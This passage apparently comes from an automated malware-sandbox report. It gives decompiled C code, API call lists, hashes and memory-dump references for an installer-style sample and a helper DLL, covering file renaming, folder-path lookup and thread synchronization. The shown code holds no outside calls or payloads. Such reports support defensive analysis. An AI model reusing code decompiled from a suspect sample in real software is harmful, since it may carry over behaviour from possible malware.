                0x004059e7
                0x004059f4
                0x00405a59
                0x00405a60
                0x00405a07
                0x00405a07
                0x00405a09
                0x00405a12
                0x00405a1d
                0x00405a2f
                0x00405a36
                0x00000000
                0x00405a36
                0x00405a62
                0x00405a63
                0x00405a68
                0x00405a6a
                0x00405a77
                0x00405a77
                0x00405a7b
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00405a6c
                0x00405a6c
                0x00405a6f
                0x00405a72
                0x00405a73
                0x00000000
                0x00405a6c
                0x004059ff
                0x00405a04
                0x00000000
                0x00405a04
                0x004059cb
                0x00405928
                0x00405933
                0x0040593c
                0x00405940
                0x00000000
                0x00000000
                0x00405940
                0x00405a4d

                APIs
                  • Part of subcall function 00405F28: GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                  • Part of subcall function 00405F28: GetProcAddress.KERNEL32(00000000,?), ref: 00405F55
                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000002,?,00000000,?,?,0040567B,?,00000000,000000F1,?), ref: 00405933
                • GetShortPathNameA.KERNEL32 ref: 0040593C
                • GetShortPathNameA.KERNEL32 ref: 00405959
                • wsprintfA.USER32 ref: 00405977
                • GetFileSize.KERNEL32(00000000,00000000,00422140,C0000000,00000004,00422140,?,?,?,00000000,000000F1,?), ref: 004059B2
                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004059C1
                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 004059D7
                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421D40,00000000,-0000000A,004093E4,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405A1D
                • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405A2F
                • GlobalFree.KERNEL32 ref: 00405A36
                • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405A3D
                  • Part of subcall function 004057E4: lstrlenA.KERNEL32(00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057EB
                  • Part of subcall function 004057E4: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581B
                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.289929586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000008.00000002.289868632.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.289964819.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290014852.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290078414.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290084814.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290095675.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290154899.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290281669.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeModulePointerProcReadSizeWritewsprintf
                • String ID: %s=%s$@!B$[Rename]
                • API String ID: 3445103937-2946522640
                • Opcode ID: ba6dd0a96c47d1f42225f0131925257862b6081e9796f2b12c44a8ffad6b8124
                • Instruction ID: 3fdb6a032fd62a2424e34f1ba2115feadd67922d203a780a084708b988c1bb31
                • Opcode Fuzzy Hash: ba6dd0a96c47d1f42225f0131925257862b6081e9796f2b12c44a8ffad6b8124
                • Instruction Fuzzy Hash: C8410231B01B167BD7206B619D89F6B3A5CEF44755F04013AFD05F62D2E67CA8008EAD
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF817D0, Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 66synchronizationCOMMON
                Download Yara Rule
                C-Code - Quality: 89%
                			E6FF817D0(intOrPtr* _a4) {
				intOrPtr* _v8;
				void* _v12;

				_v8 = _a4;
				0x6ff80000("%p\n", _a4);
				EnterCriticalSection(0x6ff850ac);
				if(_v8 == 0 ||  *_v8 != 0x50444830) {
					LeaveCriticalSection(0x6ff850ac);
					return 0xc0000bbc;
				} else {
					if( *(_v8 + 8) == 0) {
						L7:
						E6FF82C70(_v8);
						LeaveCriticalSection(0x6ff850ac);
						return 0;
					}
					_v12 =  *(_v8 + 8);
					SetEvent( *(_v8 + 0x14));
					LeaveCriticalSection(0x6ff850ac);
					WaitForSingleObject(_v12, 0xffffffff);
					EnterCriticalSection(0x6ff850ac);
					if( *_v8 == 0x50444830) {
						CloseHandle( *(_v8 + 0x14));
						CloseHandle( *(_v8 + 8));
						 *(_v8 + 8) = 0;
						goto L7;
					}
					LeaveCriticalSection(0x6ff850ac);
					return 0;
				}
			}





                0x6ff817d9
                0x6ff817e5
                0x6ff817f2
                0x6ff817fc
                0x6ff8180e
                0x00000000
                0x6ff8181e
                0x6ff81825
                0x6ff8189d
                0x6ff818a1
                0x6ff818ae
                0x00000000
                0x6ff818b4
                0x6ff8182d
                0x6ff81837
                0x6ff81842
                0x6ff8184e
                0x6ff81859
                0x6ff81868
                0x6ff81880
                0x6ff8188d
                0x6ff81896
                0x00000000
                0x6ff81896
                0x6ff8186f
                0x00000000
                0x6ff81875

                APIs
                • EnterCriticalSection.KERNEL32(6FF850AC), ref: 6FF817F2
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF8180E
                • SetEvent.KERNEL32(?), ref: 6FF81837
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF81842
                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 6FF8184E
                • EnterCriticalSection.KERNEL32(6FF850AC), ref: 6FF81859
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF8186F
                • CloseHandle.KERNEL32(?), ref: 6FF81880
                • CloseHandle.KERNEL32(?), ref: 6FF8188D
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF818AE
                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.292808279.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000008.00000002.292794605.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.292828297.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.292861128.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000008.00000002.292906890.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalSection$Leave$CloseEnterHandle$EventObjectSingleWait
                • String ID: %p$0HDP$0HDP$p-w
                • API String ID: 549566651-945182506
                • Opcode ID: 3526ad1a7a896d7b7547e9bcb5f31e24576d866e190a1aef4fa4a46a66e01423
                • Instruction ID: 71e4a87e95f6ba6d2cc2665507ea2afcdc4fa5f2683748addafc097dbdd4c64d
                • Opcode Fuzzy Hash: 3526ad1a7a896d7b7547e9bcb5f31e24576d866e190a1aef4fa4a46a66e01423
                • Instruction Fuzzy Hash: 2C215C75910108EFCB00DFE4D549AAE7BB5BF4A321F208294F5229B350DB31AE50CB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405BBA, Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 197stringCOMMON
                Download Yara Rule
                C-Code - Quality: 74%
                			E00405BBA(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t36;
				CHAR* _t37;
				signed int _t39;
				int _t40;
				char _t50;
				char _t51;
				char _t53;
				char _t55;
				void* _t63;
				signed int _t69;
				intOrPtr _t73;
				signed int _t74;
				signed int _t75;
				intOrPtr _t79;
				char _t83;
				void* _t85;
				CHAR* _t86;
				void* _t88;
				signed int _t95;
				signed int _t97;
				void* _t98;

				_t88 = __esi;
				_t85 = __edi;
				_t63 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t79 =  *0x42371c; // 0x59455b
					_t36 =  *(_t79 - 4 + _t36 * 4);
				}
				_t73 =  *0x423f78; // 0x5929fc
				_t74 = _t73 + _t36;
				_t37 = 0x422ee0;
				_push(_t63);
				_push(_t88);
				_push(_t85);
				_t86 = 0x422ee0;
				if(_a4 - 0x422ee0 < 0x800) {
					_t86 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t83 =  *_t74;
					if(_t83 == 0) {
						break;
					}
					__eflags = _t86 - _t37 - 0x400;
					if(_t86 - _t37 >= 0x400) {
						break;
					}
					_t74 = _t74 + 1;
					__eflags = _t83 - 0xfc;
					_a8 = _t74;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t86 = _t83;
							_t86 =  &(_t86[1]);
							__eflags = _t86;
						} else {
							 *_t86 =  *_t74;
							_t86 =  &(_t86[1]);
							_t74 = _t74 + 1;
						}
						continue;
					}
					_t39 =  *(_t74 + 1);
					_t75 =  *_t74;
					_t95 = (_t39 & 0x0000007f) << 0x00000007 | _t75 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t75 | 0x00000080;
					_t69 = _t75;
					_v24 = _t69;
					__eflags = _t83 - 0xfe;
					_v20 = _t39 | 0x00000080;
					_v16 = _t39;
					if(_t83 != 0xfe) {
						__eflags = _t83 - 0xfd;
						if(_t83 != 0xfd) {
							__eflags = _t83 - 0xff;
							if(_t83 == 0xff) {
								__eflags = (_t39 | 0xffffffff) - _t95;
								E00405BBA(_t69, _t86, _t95, _t86, (_t39 | 0xffffffff) - _t95);
							}
							L41:
							_t40 = lstrlenA(_t86);
							_t74 = _a8;
							_t86 =  &(_t86[_t40]);
							_t37 = 0x422ee0;
							continue;
						}
						__eflags = _t95 - 0x1d;
						if(_t95 != 0x1d) {
							__eflags = (_t95 << 0xa) + 0x425000;
							E00405B98(_t86, (_t95 << 0xa) + 0x425000);
						} else {
							E00405AF6(_t86,  *0x423f48);
						}
						__eflags = _t95 + 0xffffffeb - 7;
						if(_t95 + 0xffffffeb < 7) {
							L32:
							E00405DFA(_t86);
						}
						goto L41;
					}
					_t97 = 2;
					_t50 = GetVersion();
					__eflags = _t50;
					if(_t50 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x423fc4;
						if( *0x423fc4 != 0) {
							_t97 = 4;
						}
						__eflags = _t69;
						if(_t69 >= 0) {
							__eflags = _t69 - 0x25;
							if(_t69 != 0x25) {
								__eflags = _t69 - 0x24;
								if(_t69 == 0x24) {
									GetWindowsDirectoryA(_t86, 0x400);
									_t97 = 0;
								}
								while(1) {
									__eflags = _t97;
									if(_t97 == 0) {
										goto L29;
									}
									_t51 =  *0x423f44; // 0x73b41340
									_t97 = _t97 - 1;
									__eflags = _t51;
									if(_t51 == 0) {
										L25:
										_t53 = SHGetSpecialFolderLocation( *0x423f48,  *(_t98 + _t97 * 4 - 0x18),  &_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											L27:
											 *_t86 =  *_t86 & 0x00000000;
											__eflags =  *_t86;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t86);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t55 =  *_t51( *0x423f48,  *(_t98 + _t97 * 4 - 0x18), 0, 0, _t86);
									__eflags = _t55;
									if(_t55 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t86, 0x400);
							goto L29;
						} else {
							_t72 = (_t69 & 0x0000003f) +  *0x423f78;
							E00405A7F(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t69 & 0x0000003f) +  *0x423f78, _t86, _t69 & 0x00000040);
							__eflags =  *_t86;
							if( *_t86 != 0) {
								L30:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t86, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E00405BBA(_t72, _t86, _t97, _t86, _v16);
							L29:
							__eflags =  *_t86;
							if( *_t86 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t50 - 0x5a04;
					if(_t50 == 0x5a04) {
						goto L12;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L12;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t86 =  *_t86 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00405B98(_a4, _t37);
			}






























                0x00405bba
                0x00405bba
                0x00405bba
                0x00405bc0
                0x00405bc5
                0x00405bc7
                0x00405bd6
                0x00405bd6
                0x00405bd8
                0x00405be1
                0x00405be3
                0x00405be8
                0x00405beb
                0x00405bec
                0x00405bf3
                0x00405bf5
                0x00405bfb
                0x00405bfe
                0x00405bfe
                0x00405dd7
                0x00405dd7
                0x00405ddb
                0x00000000
                0x00000000
                0x00405c0b
                0x00405c11
                0x00000000
                0x00000000
                0x00405c17
                0x00405c18
                0x00405c1b
                0x00405c1e
                0x00405dca
                0x00405dd4
                0x00405dd6
                0x00405dd6
                0x00405dcc
                0x00405dce
                0x00405dd0
                0x00405dd1
                0x00405dd1
                0x00000000
                0x00405dca
                0x00405c24
                0x00405c28
                0x00405c38
                0x00405c3c
                0x00405c43
                0x00405c46
                0x00405c4a
                0x00405c50
                0x00405c53
                0x00405c56
                0x00405c59
                0x00405d74
                0x00405d77
                0x00405da7
                0x00405daa
                0x00405daf
                0x00405db3
                0x00405db3
                0x00405db8
                0x00405db9
                0x00405dbe
                0x00405dc1
                0x00405dc3
                0x00000000
                0x00405dc3
                0x00405d79
                0x00405d7c
                0x00405d91
                0x00405d98
                0x00405d7e
                0x00405d85
                0x00405d85
                0x00405da0
                0x00405da3
                0x00405d6c
                0x00405d6d
                0x00405d6d
                0x00000000
                0x00405da3
                0x00405c61
                0x00405c62
                0x00405c68
                0x00405c6a
                0x00405c84
                0x00405c84
                0x00405c8b
                0x00405c8b
                0x00405c92
                0x00405c96
                0x00405c96
                0x00405c97
                0x00405c99
                0x00405cd2
                0x00405cd5
                0x00405ce5
                0x00405ce8
                0x00405cf0
                0x00405cf6
                0x00405cf6
                0x00405d52
                0x00405d52
                0x00405d54
                0x00000000
                0x00000000
                0x00405cfa
                0x00405d01
                0x00405d02
                0x00405d04
                0x00405d1e
                0x00405d2c
                0x00405d32
                0x00405d34
                0x00405d4f
                0x00405d4f
                0x00405d4f
                0x00000000
                0x00405d4f
                0x00405d3a
                0x00405d45
                0x00405d4b
                0x00405d4d
                0x00000000
                0x00000000
                0x00000000
                0x00405d4d
                0x00405d06
                0x00405d09
                0x00000000
                0x00000000
                0x00405d18
                0x00405d1a
                0x00405d1c
                0x00000000
                0x00000000
                0x00000000
                0x00405d1c
                0x00000000
                0x00405d52
                0x00405cdd
                0x00000000
                0x00405c9b
                0x00405ca0
                0x00405cb6
                0x00405cbb
                0x00405cbe
                0x00405d5b
                0x00405d5b
                0x00405d5f
                0x00405d67
                0x00405d67
                0x00000000
                0x00405d5f
                0x00405cc8
                0x00405d56
                0x00405d56
                0x00405d59
                0x00000000
                0x00000000
                0x00000000
                0x00405d59
                0x00405c99
                0x00405c6c
                0x00405c70
                0x00000000
                0x00000000
                0x00405c72
                0x00405c76
                0x00000000
                0x00000000
                0x00405c78
                0x00405c7c
                0x00000000
                0x00405c7e
                0x00405c7e
                0x00000000
                0x00405c7e
                0x00405c7c
                0x00405de1
                0x00405deb
                0x00405df7
                0x00405df7
                0x00000000

                APIs
                • GetVersion.KERNEL32(00000000,0041FD10,00000000,00404EBC,0041FD10,00000000), ref: 00405C62
                • GetSystemDirectoryA.KERNEL32 ref: 00405CDD
                • GetWindowsDirectoryA.KERNEL32(ymvwfuvwx,00000400), ref: 00405CF0
                • SHGetSpecialFolderLocation.SHELL32(?,0040F0E0), ref: 00405D2C
                • SHGetPathFromIDListA.SHELL32(0040F0E0,ymvwfuvwx), ref: 00405D3A
                • CoTaskMemFree.OLE32(0040F0E0), ref: 00405D45
                • lstrcatA.KERNEL32(ymvwfuvwx,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D67
                • lstrlenA.KERNEL32(ymvwfuvwx,00000000,0041FD10,00000000,00404EBC,0041FD10,00000000), ref: 00405DB9
                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.289929586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000008.00000002.289868632.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.289964819.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290014852.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290078414.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290084814.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290095675.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290154899.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290281669.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                • String ID: Software\Microsoft\Windows\CurrentVersion$[EY$\Microsoft\Internet Explorer\Quick Launch$ymvwfuvwx
                • API String ID: 900638850-4016193863
                • Opcode ID: 722f7ba73d7118e4ab3b6bf0c831072dc3c77b8f74574a686c3719bf3172466b
                • Instruction ID: c09fc2b2839bb59ef3d9b0e1161cb0e194e2e056f91f07e7f33828596fbb00b3
                • Opcode Fuzzy Hash: 722f7ba73d7118e4ab3b6bf0c831072dc3c77b8f74574a686c3719bf3172466b
                • Instruction Fuzzy Hash: CE51F331A04A05AAEF215F648C88BBF3B74EF05714F10827BE911B62E0D27C5942DF5E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF82EC0, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 46threadsynchronizationCOMMON
                Download Yara Rule
                C-Code - Quality: 92%
                			E6FF82EC0(intOrPtr* _a4) {
				intOrPtr* _v8;
				long _v12;
				void* _v16;
				void* _t29;

				_v8 = _a4;
				_v12 =  *((intOrPtr*)(_v8 + 0xc));
				_v16 =  *((intOrPtr*)(_v8 + 0x14));
				while(WaitForSingleObject(_v16, _v12) == 0x102) {
					EnterCriticalSection(0x6ff850ac);
					if( *_v8 == 0x50444830) {
						_push(_v8);
						E6FF82EB0(_t18);
						_t29 = _t29 + 4;
						if(SetEvent( *(_v8 + 0x10)) != 0) {
							LeaveCriticalSection(0x6ff850ac);
							continue;
						}
						LeaveCriticalSection(0x6ff850ac);
						ExitThread(0);
					}
					LeaveCriticalSection(0x6ff850ac);
					ExitThread(0xc0000bbc);
				}
				ExitThread(0);
			}







                0x6ff82ec9
                0x6ff82ed2
                0x6ff82edb
                0x6ff82ede
                0x6ff82f00
                0x6ff82f0f
                0x6ff82f2a
                0x6ff82f2b
                0x6ff82f30
                0x6ff82f42
                0x6ff82f5c
                0x00000000
                0x6ff82f5c
                0x6ff82f49
                0x6ff82f51
                0x6ff82f51
                0x6ff82f16
                0x6ff82f21
                0x6ff82f21
                0x6ff82ef5

                APIs
                • WaitForSingleObject.KERNEL32(?,?), ref: 6FF82EE6
                • ExitThread.KERNEL32 ref: 6FF82EF5
                • EnterCriticalSection.KERNEL32(6FF850AC), ref: 6FF82F00
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF82F16
                • ExitThread.KERNEL32 ref: 6FF82F21
                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.292808279.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000008.00000002.292794605.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.292828297.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.292861128.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000008.00000002.292906890.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalExitSectionThread$EnterLeaveObjectSingleWait
                • String ID: 0HDP$p-w
                • API String ID: 1874301155-3830501846
                • Opcode ID: 90c20fecb2358fadc54298708bfb05b606c4c678fde9d25b6d2e778e6d14fff0
                • Instruction ID: f4264583adce84eda402ce997af3b95af4ddd08ab9722d497e959978e990e2a7
                • Opcode Fuzzy Hash: 90c20fecb2358fadc54298708bfb05b606c4c678fde9d25b6d2e778e6d14fff0
                • Instruction Fuzzy Hash: F2113C7AA10604EFCB04DFE4C549A6E7BB9BF4A311F214098F52697350DB31AA50DB51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF81C40, Relevance: 13.6, APIs: 6, Strings: 3, Instructions: 80COMMON
                Download Yara Rule
                C-Code - Quality: 82%
                			E6FF81C40(void* __ecx, intOrPtr* _a4, signed char _a8, int* _a12, void* _a16) {
				intOrPtr* _v8;

				_v8 = _a4;
				0x6ff80000("%p %d %p %p\n", _a4, _a8 & 0x000000ff, _a12, _a16, __ecx);
				EnterCriticalSection(0x6ff850ac);
				if(_v8 == 0 ||  *_v8 != 0x50444831) {
					LeaveCriticalSection(0x6ff850ac);
					return 0xc0000bbc;
				} else {
					if(_a12 != 0) {
						if( *_a12 >= 0x48) {
							memset(_a16, 0, 0x48);
							 *((intOrPtr*)(_a16 + 4)) =  *((intOrPtr*)(_v8 + 8));
							 *((intOrPtr*)(_a16 + 0xc)) =  *((intOrPtr*)(_v8 + 0xc));
							 *((intOrPtr*)(_a16 + 0x10)) =  *((intOrPtr*)(_v8 + 0x10));
							 *((intOrPtr*)(_a16 + 0x14)) =  *((intOrPtr*)(_v8 + 0x14));
							 *((intOrPtr*)(_a16 + 0x18)) =  *((intOrPtr*)(_v8 + 0x18));
							 *((intOrPtr*)(_a16 + 0x1c)) =  *((intOrPtr*)(_v8 + 0x1c));
							 *_a12 = 0x48;
							LeaveCriticalSection(0x6ff850ac);
							return 0;
						}
						 *_a12 = 0x48;
						LeaveCriticalSection(0x6ff850ac);
						return 0x800007d2;
					}
					LeaveCriticalSection(0x6ff850ac);
					return 0xc0000bbd;
				}
			}




                0x6ff81c47
                0x6ff81c60
                0x6ff81c6d
                0x6ff81c77
                0x6ff81c89
                0x00000000
                0x6ff81c99
                0x6ff81c9d
                0x6ff81cba
                0x6ff81cdf
                0x6ff81cf0
                0x6ff81cfc
                0x6ff81d08
                0x6ff81d14
                0x6ff81d20
                0x6ff81d2c
                0x6ff81d32
                0x6ff81d3d
                0x00000000
                0x6ff81d43
                0x6ff81cbf
                0x6ff81cca
                0x00000000
                0x6ff81cd0
                0x6ff81ca4
                0x00000000
                0x6ff81caa

                APIs
                • EnterCriticalSection.KERNEL32(6FF850AC), ref: 6FF81C6D
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF81C89
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF81CA4
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF81CCA
                • memset.MSVCRT ref: 6FF81CDF
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF81D3D
                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.292808279.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000008.00000002.292794605.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.292828297.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.292861128.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000008.00000002.292906890.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalSection$Leave$Entermemset
                • String ID: %p %d %p %p$1HDP$p-w
                • API String ID: 2581898777-2455463802
                • Opcode ID: bd2cd142d1bd3dc1a2029987f741d39e6c4ebda0376af2b1899dbe036140048e
                • Instruction ID: 7fbcc722d051a8f12852a4e71a99731a150f8dc2b8744c78af989262f8faa46a
                • Opcode Fuzzy Hash: bd2cd142d1bd3dc1a2029987f741d39e6c4ebda0376af2b1899dbe036140048e
                • Instruction Fuzzy Hash: 3831F5B9600209DFCB04CF88C684A9E7BF1BF49314F218199F8269B351D735ED11CBA2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF81B30, Relevance: 13.6, APIs: 6, Strings: 3, Instructions: 80COMMON
                Download Yara Rule
                C-Code - Quality: 82%
                			E6FF81B30(void* __ecx, intOrPtr* _a4, signed char _a8, int* _a12, void* _a16) {
				intOrPtr* _v8;

				_v8 = _a4;
				0x6ff80000("%p %d %p %p\n", _a4, _a8 & 0x000000ff, _a12, _a16, __ecx);
				EnterCriticalSection(0x6ff850ac);
				if(_v8 == 0 ||  *_v8 != 0x50444831) {
					LeaveCriticalSection(0x6ff850ac);
					return 0xc0000bbc;
				} else {
					if(_a12 != 0) {
						if( *_a12 >= 0x48) {
							memset(_a16, 0, 0x48);
							 *((intOrPtr*)(_a16 + 4)) =  *((intOrPtr*)(_v8 + 8));
							 *((intOrPtr*)(_a16 + 0xc)) =  *((intOrPtr*)(_v8 + 0xc));
							 *((intOrPtr*)(_a16 + 0x10)) =  *((intOrPtr*)(_v8 + 0x10));
							 *((intOrPtr*)(_a16 + 0x14)) =  *((intOrPtr*)(_v8 + 0x14));
							 *((intOrPtr*)(_a16 + 0x18)) =  *((intOrPtr*)(_v8 + 0x18));
							 *((intOrPtr*)(_a16 + 0x1c)) =  *((intOrPtr*)(_v8 + 0x1c));
							 *_a12 = 0x48;
							LeaveCriticalSection(0x6ff850ac);
							return 0;
						}
						 *_a12 = 0x48;
						LeaveCriticalSection(0x6ff850ac);
						return 0x800007d2;
					}
					LeaveCriticalSection(0x6ff850ac);
					return 0xc0000bbd;
				}
			}




                0x6ff81b37
                0x6ff81b50
                0x6ff81b5d
                0x6ff81b67
                0x6ff81b79
                0x00000000
                0x6ff81b89
                0x6ff81b8d
                0x6ff81baa
                0x6ff81bcf
                0x6ff81be0
                0x6ff81bec
                0x6ff81bf8
                0x6ff81c04
                0x6ff81c10
                0x6ff81c1c
                0x6ff81c22
                0x6ff81c2d
                0x00000000
                0x6ff81c33
                0x6ff81baf
                0x6ff81bba
                0x00000000
                0x6ff81bc0
                0x6ff81b94
                0x00000000
                0x6ff81b9a

                APIs
                • EnterCriticalSection.KERNEL32(6FF850AC), ref: 6FF81B5D
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF81B79
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF81B94
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF81BBA
                • memset.MSVCRT ref: 6FF81BCF
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF81C2D
                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.292808279.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000008.00000002.292794605.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.292828297.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.292861128.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000008.00000002.292906890.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalSection$Leave$Entermemset
                • String ID: %p %d %p %p$1HDP$p-w
                • API String ID: 2581898777-2455463802
                • Opcode ID: 9afd512a9e6091f151f222e9e98f75a72624d53a4b87fa1f9a245df4b0e219fc
                • Instruction ID: b47ffb6cdd1f4ebb81bbc2f625be84e17ca4c34b9107786808a345b272defb3a
                • Opcode Fuzzy Hash: 9afd512a9e6091f151f222e9e98f75a72624d53a4b87fa1f9a245df4b0e219fc
                • Instruction Fuzzy Hash: 5F31E6B9600209DFCB04CF48C544A9E7BF1BF4A314F218599F8269B361D735ED11CBA2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405DFA, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00405DFA(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E004056F8(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E004056B6("*?|<>/\":", _t5))) == 0) {
							E00405830(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                0x00405dfc
                0x00405e04
                0x00405e18
                0x00405e18
                0x00405e1e
                0x00405e2b
                0x00405e2b
                0x00405e2c
                0x00405e2e
                0x00405e32
                0x00405e34
                0x00405e3d
                0x00405e3f
                0x00405e59
                0x00405e61
                0x00405e61
                0x00405e66
                0x00405e68
                0x00405e6a
                0x00405e6e
                0x00405e6f
                0x00405e72
                0x00405e7a
